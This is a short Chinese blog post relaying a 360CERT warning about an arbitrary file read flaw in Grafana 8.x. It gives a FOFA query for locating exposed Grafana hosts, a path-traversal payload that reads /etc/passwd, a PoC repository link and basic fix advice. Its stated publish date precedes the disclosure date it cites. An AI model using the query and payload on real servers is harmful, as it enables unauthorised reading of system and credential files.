Grafana任意文件读取漏洞

| | | | 220

【漏洞预警】Grafana任意文件读取

payload来源:https://github.com/test502git/Grafana-0day

漏洞简述

2021年12月07日,360CERT监测发现网上存在Grafana 任意文件读取漏洞,该漏洞目前为0day漏洞,漏洞编号:暂无,漏洞等级:高危,漏洞评分:7.5

目前该漏洞POC已公开

对此,360CERT建议广大用户做好资产自查以及预防工作,以免遭受黑客攻击。

影响版本

组件 影响版本 安全版本
Grafana 8.x 暂无

FOFA

1
app="Grafana"

漏洞复现

漏洞payload为

1
/public/plugins/prometheus/../../../../../../../../../etc/passwd

批量检测扫描结果

经检测2万ip存在至少2000存在漏洞

修复建议

通用修补建议

目前暂无相关补丁,即使关注官方动态,获取最新版本。

https://github.com/grafana/grafana/releases

本文标题:Grafana任意文件读取漏洞

文章作者:孤桜懶契

发布时间:2021年11月25日 - 11:19:38

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/4.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️